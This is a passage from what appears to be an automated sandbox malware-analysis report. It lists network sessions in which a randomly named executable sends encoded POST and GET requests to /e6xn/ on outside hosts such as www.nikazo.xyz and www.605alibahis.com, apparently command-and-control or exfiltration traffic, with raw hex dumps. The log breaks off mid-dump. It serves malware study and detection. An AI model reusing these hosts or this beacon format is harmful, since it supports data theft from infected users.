                                                                                  Data Raw: 62 76 4f 74 3d 53 49 52 70 50 34 34 43 71 38 52 52 4d 52 77 70 39 59 32 57 54 48 74 66 58 57 52 50 63 34 77 76 75 37 6b 44 5a 4a 74 66 73 76 43 43 4a 37 69 46 31 4d 52 35 43 54 2f 6b 56 6b 4a 31 57 4f 61 78 34 38 6d 64 6b 2f 37 56 56 4b 72 34 6c 73 67 68 6e 74 6d 58 70 34 36 6b 50 79 6d 47 44 62 6b 77 35 33 6d 30 58 7a 6f 77 36 49 44 57 30 76 42 41 63 69 6e 77 53 4a 61 30 41 6d 61 44 5a 37 63 41 32 2f 51 59 76 69 62 6a 58 48 4c 54 69 69 4f 33 66 4f 39 7a 79 79 4c 65 31 5a 69 31 73 31 50 45 78 56 47 4c 2f 66 37 72 68 75 33 6c 6c 64 50 4c 33 49 4c 61 2f 51 69 4f 48 70 4b 44 38 79 4d 5a 55 76 37 51 4d 32 78 56 6b 35 4b 49 48 77 41 56 70 67 3d 3d
                                                                                  Data Ascii: bvOt=SIRpP44Cq8RRMRwp9Y2WTHtfXWRPc4wvu7kDZJtfsvCCJ7iF1MR5CT/kVkJ1WOax48mdk/7VVKr4lsghntmXp46kPymGDbkw53m0Xzow6IDW0vBAcinwSJa0AmaDZ7cA2/QYvibjXHLTiiO3fO9zyyLe1Zi1s1PExVGL/f7rhu3lldPL3ILa/QiOHpKD8yMZUv7QM2xVk5KIHwAVpg==
                                                                                  Mar 18, 2024 14:47:39.918720007 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:39 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.104973966.29.152.141806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:42.327943087 CET1782OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 53 49 52 70 50 34 34 43 71 38 52 52 4d 52 77 70 39 59 32 57 54 48 74 66 58 57 52 50 63 34 77 76 75 37 6b 44 5a 4a 74 66 73 76 4b 43 4a 4a 71 46 31 74 52 35 44 54 2f 6b 5a 45 4a 6f 57 4f 62 30 34 38 76 55 6b 2f 32 75 56 49 6a 34 33 65 6f 68 68 63 6d 58 67 34 36 6b 4e 79 6d 46 48 62 6b 6c 35 33 32 77 58 7a 34 77 36 49 44 57 30 73 5a 41 4d 41 50 77 42 35 61 33 51 32 61 50 50 4c 64 6e 32 2f 59 69 76 69 66 64 58 32 33 54 69 47 71 33 59 39 46 7a 2b 79 4b 34 32 5a 69 58 73 31 53 45 78 57 6a 30 2f 65 2f 42 68 70 37 6c 68 4b 43 7a 6b 37 76 63 39 47 6e 51 48 36 79 55 33 31 45 6c 4d 64 53 74 49 6b 4a 7a 35 36 7a 4a 4b 69 70 47 37 53 65 6c 78 4d 33 39 32 61 58 4c 45 79 77 31 51 4b 6a 78 30 75 79 4f 43 44 30 31 42 4e 4b 30 5a 6a 70 43 69 46 65 65 66 65 4f 35 58 71 62 44 46 6b 54 71 34 4b 61 42 41 2f 73 79 78 6e 4f 44 56 77 43 66 49 6c 38 64 72 35 6a 78 68 6e 35 70 53 37 4e 45 64 46 7a 77 6c 64 6a 41 34 4a 65 63 58 4f 6b 4d 32 49 78 36 78 42 75 46 68 48 6a 32 6f 49 44 4d 4e 63 4e 32 68 41 79 2b 59 56 45 75 61 6d 2f 59 54 52 45 4c 57 36 6f 46 6f 35 35 6b 6a 42 42 75 39 5a 61 48 64 79 36 37 70 68 4a 71 38 78 4c 65 4f 45 72 50 78 67 4c 43 6e 58 33 67 36 76 7a 75 48 68 6c 73 69 65 71 45 42 48 42 68 72 72 44 39 4a 77 65 4f 75 44 62 74 62 4a 53 30 4e 6a 4c 76 79 6d 30 6c 47 66 61 52 50 48 64 4b 49 7a 2f 53 65 36 6a 51 70 74 57 4d 55 39 37 4a 74 38 34 65 41 62 54 72 6e 70 65 78 37 42 61 48 72 30 6a 37 36 56 4d 65 36 4c 76 54 56 59 75 66 35 37 54 64 52 68 65 7a 32 41 7a 5a 4d 5a 6d 59 5a 36 4c 71 72 30 50 67 78 49 30 44 4c 57 6e 7a 63 30 74 53 56 61 42 63 57 4e 42 4e 34 73 32 6c 73 68 30 52 39 37 4d 6b 72 65 76 54 31 48 51 37 6b 41 32 48 32 4a 74 72 32 71 68 36 78 38 4c 4f 73 75 55 6a 31 39 75 46 6f 77 64 7a 54 4e 49 74 69 6c 71 48 74 70 30 65 4b 36 51 71 6c 73 72 49 5a 57 46 35 39 4b 68 59 41 4f 4e 76 4c 73 6c 53 49 34 38 6d 4b 7a 43 4b 4c 71 71 78 36 35 4a 79 42 34 32 48 34 49 36 57 35 56 37 46 68 2b 75 68 6e 49 37 6b 34 37 52 6f 52 53 6b 4d 49 64 71 42 61 4c 53 6f 7a 6f 70 58 70 77 41 4e 6f 53 6c 2f 44 69 4d 4d 33 77 68 51 37 37 6b 5a 77 74 4e 42 54 4e 65 50 59 42 55 6d 57 4f 4a 6b 7a 77 31 54 74 61 41 67 6e 43 32 6c 57 34 72 52 57 78 6a 43 31 65 62 6d 43 34 39 6d 52 6f 4e 46 33 58 31 6d 39 56 63 78 6b 43 31 4b 47 50 6b 39 55 32 6e 57 34 57 7a 74 4b 53 62 33 72 33 63 74 33 4a 30 31 57 47 2b 42 48 34 42 2b 44 76 4e 61 43 73 72 69 43 6b 4e 65 6a 57 67 35 32 44 6f 74 67 39 45 45 6c 6e 61 64 66 79 76 5a 4c 42 5a 52 35 4d 30 52 57 34 53 70 78 53 4a 75 31 30 69 56 53 42 38 34 61 6c 4d 46 43 47 65 6b 37 39 64 77 78 6d 45 79 2b 34 6b 69 6d 39 56 65 58 35 61 67 6c 5a 4b 44 76 33 6f 71 73 78 6b 41 6b 33 69 56 70 50 49 34 43 48 36 68 76 31 4f 32 50 2f 42 66 37 36 46 6c 48 2b 71 4b 45 6e 4e 6d 6f 71 4d 32 73 59 44 61 32 52 4d 50 76 2b 6a 43 4b 62 67 35 58 47 4b 66 34 37 43 31 45 71 2b 6e 72 71 43 75 47 52 57 2f 70 4f 69 77 78 6d 62 44 32 46 53 49 43 62 30 6c 45 55 4e 75 53 46 57 65 6e 7a 38 46 52 2f 4a 42 64 58 64 4b 2b 55 49 67 47 63 48 5a 41 2b 42 68 44 57 43 49 70 37 65 4d 32 37 6b 46 4c 71 4c 2b 39 44 6f 42 43 65 42 33 6c 4f 70 53 6b 78 52 2f 33 35 6b 38 7a 35 32 78 44 79 63 32 4b 79 66 77 71 61 4d 41 39 4f 6c 42 2f 41 38 75 57 39 5a 76 66 57 4b 6b 41 67 4e 64 70 33 30 43 50 44 59 31 36 49 6b 62 56 67 35 4c 39 47 72 70 6d 6e 4f 72 43 2f 59 72 69 69 50 44 4c 63 35 31 4c 64 42 7a 6c 43 59 71 4a 7a 74 35 57 6d 4a 56 53 62 56 45 4b 47 78 4f 7a 72 46 4d 65 46 55 75 63 36 57 6c 62 69 67 30 59 64 65 66 6e 77 78 51 78 62 52 67 47 65 4d 77 62 47 62 64 33 4e 66 58 42 78 66 50 69 36 64 48 45 64 4c 37 72 2b 64 41 35 4e 49 6c 34 58 69 35 67 70 35 4f 48 33 2f 51 74 53 5a 6d 79 74 68 33 39 44 6a 61 6d 78 4d 71 51 68 38 39 70 53 66 4b 48 67 63 3d
                                                                                  Data Ascii: bvOt=SIRpP44Cq8RRMRwp9Y2WTHtfXWRPc4wvu7kDZJtfsvKCJJqF1tR5DT/kZEJoWOb048vUk/2uVIj43eohhcmXg46kNymFHbkl532wXz4w6IDW0sZAMAPwB5a3Q2aPPLdn2/YivifdX23TiGq3Y9Fz+yK42ZiXs1SExWj0/e/Bhp7lhKCzk7vc9GnQH6yU31ElMdStIkJz56zJKipG7SelxM392aXLEyw1QKjx0uyOCD01BNK0ZjpCiFeefeO5XqbDFkTq4KaBA/syxnODVwCfIl8dr5jxhn5pS7NEdFzwldjA4JecXOkM2Ix6xBuFhHj2oIDMNcN2hAy+YVEuam/YTRELW6oFo55kjBBu9ZaHdy67phJq8xLeOErPxgLCnX3g6vzuHhlsieqEBHBhrrD9JweOuDbtbJS0NjLvym0lGfaRPHdKIz/Se6jQptWMU97Jt84eAbTrnpex7BaHr0j76VMe6LvTVYuf57TdRhez2AzZMZmYZ6Lqr0PgxI0DLWnzc0tSVaBcWNBN4s2lsh0R97MkrevT1HQ7kA2H2Jtr2qh6x8LOsuUj19uFowdzTNItilqHtp0eK6QqlsrIZWF59KhYAONvLslSI48mKzCKLqqx65JyB42H4I6W5V7Fh+uhnI7k47RoRSkMIdqBaLSozopXpwANoSl/DiMM3whQ77kZwtNBTNePYBUmWOJkzw1TtaAgnC2lW4rRWxjC1ebmC49mRoNF3X1m9VcxkC1KGPk9U2nW4WztKSb3r3ct3J01WG+BH4B+DvNaCsriCkNejWg52Dotg9EElnadfyvZLBZR5M0RW4SpxSJu10iVSB84alMFCGek79dwxmEy+4kim9VeX5aglZKDv3oqsxkAk3iVpPI4CH6hv1O2P/Bf76FlH+qKEnNmoqM2sYDa2RMPv+jCKbg5XGKf47C1Eq+nrqCuGRW/pOiwxmbD2FSICb0lEUNuSFWenz8FR/JBdXdK+UIgGcHZA+BhDWCIp7eM27kFLqL+9DoBCeB3lOpSkxR/35k8z52xDyc2KyfwqaMA9OlB/A8uW9ZvfWKkAgNdp30CPDY16IkbVg5L9GrpmnOrC/YriiPDLc51LdBzlCYqJzt5WmJVSbVEKGxOzrFMeFUuc6Wlbig0YdefnwxQxbRgGeMwbGbd3NfXBxfPi6dHEdL7r+dA5NIl4Xi5gp5OH3/QtSZmyth39DjamxMqQh89pSfKHgc=
                                                                                  Mar 18, 2024 14:47:42.656615019 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:42 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.104974066.29.152.141806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:45.037863016 CET496OUTGET /e6xn/?bvOt=fK5JMP1eyt4jdSIw5YXXC01WYkEietwRjqQFc45Aj4a+GaPHnYBED0rkUElBfcfrwtDI0snSXtvXktZSmOPgjr2IHnyFN7VJ42KSbRcfuNaQ+9lGPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:45.352355003 CET548INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:45 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.1049741192.64.119.184806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:50.648511887 CET760OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 58 69 4b 53 41 6d 44 78 6a 70 47 78 53 51 47 55 68 79 6c 35 66 37 35 49 58 6a 6d 4b 67 72 6d 34 7a 5a 32 56 34 46 39 62 46 41 71 61 51 53 62 34 52 61 47 4c 6c 75 34 69 6e 33 52 78 4b 6c 77 73 50 4e 77 46 78 78 79 6d 6c 7a 43 58 68 33 65 4a 68 56 73 4d 6a 70 4f 76 61 72 66 62 32 74 4b 39 62 74 43 4d 51 46 30 79 7a 79 49 53 32 74 64 58 36 48 62 2f 62 53 54 4b 31 59 58 57 62 4b 4e 4f 57 65 34 4a 51 30 41 74 2b 71 67 66 42 64 56 6d 68 62 4e 45 48 37 36 68 56 6b 77 37 64 69 6b 38 31 69 47 34 55 4e 48 48 56 45 4f 32 6d 35 70 4f 63 70 2b 7a 49 30 63 6a 42 58 62 61
                                                                                  Data Ascii: bvOt=XiKSAmDxjpGxSQGUhyl5f75IXjmKgrm4zZ2V4F9bFAqaQSb4RaGLlu4in3RxKlwsPNwFxxymlzCXh3eJhVsMjpOvarfb2tK9btCMQF0yzyIS2tdX6Hb/bSTK1YXWbKNOWe4JQ0At+qgfBdVmhbNEH76hVkw7dik81iG4UNHHVEO2m5pOcp+zI0cjBXba
                                                                                  Mar 18, 2024 14:47:50.769717932 CET214INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:50 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.1049742192.64.119.184806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:53.290654898 CET784OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 58 69 4b 53 41 6d 44 78 6a 70 47 78 44 41 57 55 6e 54 6c 35 59 62 35 4a 4b 54 6d 4b 71 4c 6d 38 7a 5a 79 56 34 45 70 4c 46 53 4f 61 51 79 4c 34 53 65 61 4c 67 75 34 69 76 58 52 30 46 46 77 6e 50 4e 38 6e 78 7a 6d 6d 6c 33 53 58 68 32 75 4a 68 47 45 4c 69 35 4f 74 50 37 66 5a 37 4e 4b 39 62 74 43 4d 51 46 51 63 7a 79 51 53 32 2b 46 58 72 57 62 38 52 79 54 4a 39 34 58 57 49 61 4d 6d 57 65 35 63 51 32 30 4c 2b 70 59 66 42 63 6c 6d 68 71 4e 46 4e 37 36 34 4b 30 78 75 65 68 39 6c 31 78 6d 54 4e 2f 54 4b 4b 69 75 78 73 34 49 4a 4e 34 66 6b 62 44 41 74 50 52 75 77 50 4f 62 32 78 4d 66 37 77 65 6d 44 69 31 6c 30 61 33 76 64 33 41 3d 3d
                                                                                  Data Ascii: bvOt=XiKSAmDxjpGxDAWUnTl5Yb5JKTmKqLm8zZyV4EpLFSOaQyL4SeaLgu4ivXR0FFwnPN8nxzmml3SXh2uJhGELi5OtP7fZ7NK9btCMQFQczyQS2+FXrWb8RyTJ94XWIaMmWe5cQ20L+pYfBclmhqNFN764K0xueh9l1xmTN/TKKiuxs4IJN4fkbDAtPRuwPOb2xMf7wemDi1l0a3vd3A==
                                                                                  Mar 18, 2024 14:47:53.411901951 CET214INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:53 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.1049743192.64.119.184806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:56.602242947 CET1797OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 58 69 4b 53 41 6d 44 78 6a 70 47 78 44 41 57 55 6e 54 6c 35 59 62 35 4a 4b 54 6d 4b 71 4c 6d 38 7a 5a 79 56 34 45 70 4c 46 53 47 61 51 45 48 34 52 2f 61 4c 6e 75 34 69 75 58 52 31 46 46 77 41 50 4e 55 6a 78 7a 72 5a 6c 78 4f 58 67 55 6d 4a 77 48 45 4c 73 35 4f 74 51 4c 66 55 32 74 4b 73 62 74 79 41 51 46 67 63 7a 79 51 53 32 2f 31 58 72 48 62 38 43 69 54 4b 31 59 58 67 62 4b 4e 4c 57 66 64 4d 51 32 68 32 2f 5a 34 66 42 2f 64 6d 79 38 5a 46 4c 72 36 74 4a 30 77 74 65 68 42 41 31 78 71 66 4e 2b 58 77 4b 6c 61 78 68 2f 4a 31 55 73 76 6c 48 43 63 44 4d 51 69 4f 49 61 2f 4c 32 39 2b 45 2f 75 43 49 34 47 6f 78 61 33 79 32 73 6e 55 6a 49 6c 5a 75 77 72 69 44 34 31 61 71 70 71 7a 67 54 54 67 65 41 78 79 32 57 69 61 6a 70 38 4c 76 6d 46 50 78 70 6c 64 46 64 54 61 76 34 69 6f 44 73 35 68 49 72 4a 2f 2b 4e 58 6c 62 59 52 51 37 4f 4e 76 55 76 6e 64 62 4d 2f 51 6b 73 71 45 74 2f 2b 73 62 4d 31 78 31 62 4f 43 69 69 2f 2f 53 77 42 58 7a 48 4b 71 62 64 6d 63 4f 67 42 48 74 54 53 51 30 76 58 34 34 62 31 50 62 37 4c 62 71 39 38 62 36 74 56 54 66 71 4c 77 75 75 41 48 32 6d 34 44 48 55 36 49 46 58 32 55 64 68 49 33 79 2f 69 4e 30 4d 2f 4a 69 79 49 38 62 64 48 44 6a 54 6e 69 42 36 78 55 51 4b 50 5a 4b 49 37 6d 67 66 67 39 6b 35 74 6c 68 7a 6a 32 6a 4f 72 59 34 39 31 42 4a 52 71 6c 4e 44 63 41 55 50 57 44 55 52 62 6d 2f 58 76 39 36 76 6b 34 65 63 65 77 2f 70 78 42 67 45 69 48 71 54 43 72 50 78 4f 68 54 63 6a 2f 48 33 59 2b 42 41 72 65 78 7a 74 74 35 51 54 34 75 62 71 56 48 31 4a 78 50 53 73 48 55 2b 56 67 42 54 61 52 6b 6a 4d 4f 58 42 36 32 37 4e 68 71 2f 76 4c 6b 49 61 4b 35 6c 62 6a 6c 4b 62 72 35 71 55 5a 76 72 4a 6e 42 75 61 63 31 62 6a 76 44 4d 67 7a 74 4e 71 7a 62 39 73 67 35 34 36 63 34 32 51 55 71 32 63 46 52 37 6d 73 6a 4a 75 59 36 48 6b 42 6b 6c 78 33 73 64 6b 6a 46 50 7a 6b 48 55 4a 4d 52 39 43 4d 76 35 57 62 44 76 64 71 48 4f 49 75 65 63 76 49 6d 2b 33 2b 56 75 45 64 71 4c 78 4d 34 45 48 42 48 48 76 51 4c 59 44 62 57 4c 4c 2b 71 65 4a 71 61 42 4a 4f 5a 64 36 49 4d 55 59 61 2f 63 49 41 59 72 4c 37 72 67 6e 4f 57 67 39 78 45 47 64 61 75 70 54 39 76 6e 4b 34 63 4e 54 76 4f 52 56 4e 56 47 57 7a 6d 58 31 6b 50 32 35 63 63 54 43 4a 69 53 76 4e 62 37 31 70 6c 72 47 55 68 4b 63 68 43 71 4a 36 55 47 45 76 71 30 49 53 37 2f 62 69 5a 67 6f 45 58 45 65 39 37 54 62 75 57 44 61 72 72 72 59 4d 58 65 30 51 68 4e 70 59 35 51 6c 61 45 46 54 52 78 66 62 73 70 6f 44 4a 68 31 49 2b 68 72 4a 4f 32 76 78 76 35 57 46 61 74 67 30 5a 64 34 4c 50 58 62 2f 39 6b 66 77 37 72 55 6f 6f 6e 4e 6f 61 61 66 53 43 68 4b 52 6e 57 72 50 50 63 69 59 34 35 68 46 4c 59 64 54 6a 44 44 6b 39 51 64 6e 57 47 4e 68 69 53 79 63 56 62 73 49 37 67 56 71 5a 32 56 37 38 2f 44 47 48 70 64 56 44 37 66 55 68 69 38 31 6e 34 62 46 79 74 6b 6a 51 2b 4f 6c 6b 31 66 6e 6b 4a 4c 48 73 50 44 4e 6c 4a 63 65 6e 47 6d 78 72 4c 70 53 36 68 4d 4b 74 50 6f 34 65 52 6f 